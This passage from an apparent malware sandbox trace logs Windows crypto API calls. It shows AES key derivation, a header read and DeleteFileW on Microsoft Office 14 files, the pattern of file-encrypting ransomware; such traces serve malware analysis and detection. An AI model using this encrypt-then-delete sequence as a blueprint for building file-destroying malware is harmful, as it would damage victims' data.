lpFileSizeHigh=0x0) returned 0x21ac [0161.499] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0161.510] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0161.510] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0161.510] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.512] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Modern.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\modern.dotx")) returned 1 [0161.514] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0161.514] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0161.514] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.514] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0161.514] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8ce63 [0161.514] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0161.560] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0161.560] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0161.560] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.562] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Newsprint.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\newsprint.dotx")) returned 1 [0161.568] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0161.568] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0161.568] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.568] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0161.568] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5adf [0161.568] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0161.572] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0161.572] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0161.572] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.573] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Perspective.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\perspective.dotx")) returned 1 [0161.575] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0161.576] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0161.576] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.576] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0161.576] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x20f8 [0161.576] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0161.628] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0161.628] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0161.628] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.630] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Simple.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\simple.dotx")) returned 1 [0161.631] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0161.632] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0161.632] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.632] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0161.632] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5d3e [0161.632] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0161.680] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0161.680] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0161.680] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.681] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Thatch.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\thatch.dotx")) returned 1 [0161.683] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52568) returned 1 [0161.683] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0161.683] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.683] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0161.683] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x21f0 [0161.683] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0161.700] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0161.700] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0161.700] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.701] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Traditional.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\traditional.dotx")) returned 1 [0161.710] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0161.712] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0161.712] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0161.713] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0161.730] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0161.741] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0161.750] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0161.750] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0161.750] CryptHashData (hHash=0x284d528, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.751] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0161.751] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6886 [0161.751] ReadFile (in: hFile=0x4ac, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0161.762] CryptDestroyHash (hHash=0x284d528) returned 1 [0161.762] CryptDestroyKey (hKey=0x284d568) returned 1 [0161.762] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.763] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSClientManifest.man" (normalized: "c:\\program files\\microsoft office\\office14\\bcsclientmanifest.man")) returned 1 [0161.764] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52568) returned 1 [0161.765] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0161.765] CryptHashData (hHash=0x284d5a8, pbData=0x280c7a8, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.765] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0161.765] GetFileSize (in: hFile=0x494, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x8d51 [0161.765] ReadFile (in: hFile=0x494, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0161.791] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0161.791] CryptDestroyKey (hKey=0x284d568) returned 1 [0161.791] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0161.793] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\BCSEvents.man" (normalized: "c:\\program files\\microsoft office\\office14\\bcsevents.man")) returned 1 [0161.814] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0161.815] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0161.827] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0161.849] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0161.862] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0161.872] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0161.873] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0161.873] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0161.873] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0161.873] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0161.874] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0161.874] CryptHashData (hHash=0x284d5e8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.874] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0161.874] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3fe4ab [0161.874] ReadFile (in: hFile=0x4a8, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0162.265] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0162.265] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0162.265] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0162.267] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Document Parts\\1033\\14\\Built-In Building Blocks.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\document parts\\1033\\14\\built-in building blocks.dotx")) returned 1 [0162.275] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0162.292] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0162.304] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0162.305] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0162.306] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0162.307] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0162.307] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0162.308] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0162.308] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.308] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d5e8) returned 1 [0162.308] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2de [0162.308] ReadFile (in: hFile=0x4a8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0162.327] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0162.327] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0162.327] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.351] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Components\\SignedComponents.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\components\\signedcomponents.cer")) returned 1 [0162.369] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0162.370] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0162.370] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0162.370] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.370] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d5e8) returned 1 [0162.370] GetFileSize (in: hFile=0x4e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x290 [0162.370] ReadFile (in: hFile=0x4e0, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0162.376] CryptDestroyHash (hHash=0x284d628) returned 1 [0162.376] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0162.376] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.403] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\ManagedObjects\\SignedManagedObjects.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\managedobjects\\signedmanagedobjects.cer")) returned 1 [0162.404] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0162.404] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0162.405] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0162.405] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.405] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d5e8) returned 1 [0162.405] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3b0 [0162.405] ReadFile (in: hFile=0x4a8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0162.425] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0162.425] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0162.425] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.426] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\groove.net\\Servers\\Management.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\groove.net\\servers\\management.cer")) returned 1 [0162.427] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0162.458] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0162.459] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0162.460] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0162.460] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.460] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d5e8) returned 1 [0162.460] GetFileSize (in: hFile=0x4e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3ae [0162.460] ReadFile (in: hFile=0x4e0, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0162.470] CryptDestroyHash (hHash=0x284d628) returned 1 [0162.470] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0162.470] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.471] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VeriSign_Class_3_Code_Signing_2001-4_CA.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\verisign\\components\\verisign_class_3_code_signing_2001-4_ca.cer")) returned 1 [0162.473] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0162.473] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0162.473] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.473] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d5e8) returned 1 [0162.473] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x240 [0162.473] ReadFile (in: hFile=0x4a8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0162.491] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0162.491] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0162.491] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.492] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VeriSign_Class_3_Public_Primary_CA.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\verisign\\components\\verisign_class_3_public_primary_ca.cer")) returned 1 [0162.493] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0162.494] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0162.494] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.494] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d5e8) returned 1 [0162.494] GetFileSize (in: hFile=0x4e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x38b [0162.494] ReadFile (in: hFile=0x4e0, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0162.496] CryptDestroyHash (hHash=0x284d628) returned 1 [0162.496] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0162.496] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.497] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Certificates\\Verisign\\Components\\VS_ComponentSigningIntermediate.cer" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\certificates\\verisign\\components\\vs_componentsigningintermediate.cer")) returned 1 [0162.498] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0162.509] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0162.510] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0162.510] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0162.510] CryptHashData (hHash=0x284d668, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.511] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0162.511] GetFileSize (in: hFile=0x4cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7302 [0162.511] ReadFile (in: hFile=0x4cc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0162.537] CryptDestroyHash (hHash=0x284d668) returned 1 [0162.537] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0162.538] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.538] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\People\\Whistling.wav" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\people\\whistling.wav")) returned 1 [0162.547] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0162.554] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0162.561] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0162.563] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0162.563] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0162.563] CryptHashData (hHash=0x284d5a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.563] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0162.563] GetFileSize (in: hFile=0x4c8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x14c9 [0162.563] ReadFile (in: hFile=0x4c8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0162.577] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0162.577] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0162.577] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0162.579] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\CalendarToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\calendartooliconimages.jpg")) returned 1 [0162.580] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0162.580] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0162.580] CryptHashData (hHash=0x284d6a8, pbData=0x27f6340, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.580] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d5e8) returned 1 [0162.580] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x538 [0162.580] ReadFile (in: hFile=0x4a8, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0162.596] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0162.596] CryptDestroyKey (hKey=0x284d5e8) returned 1 [0162.596] 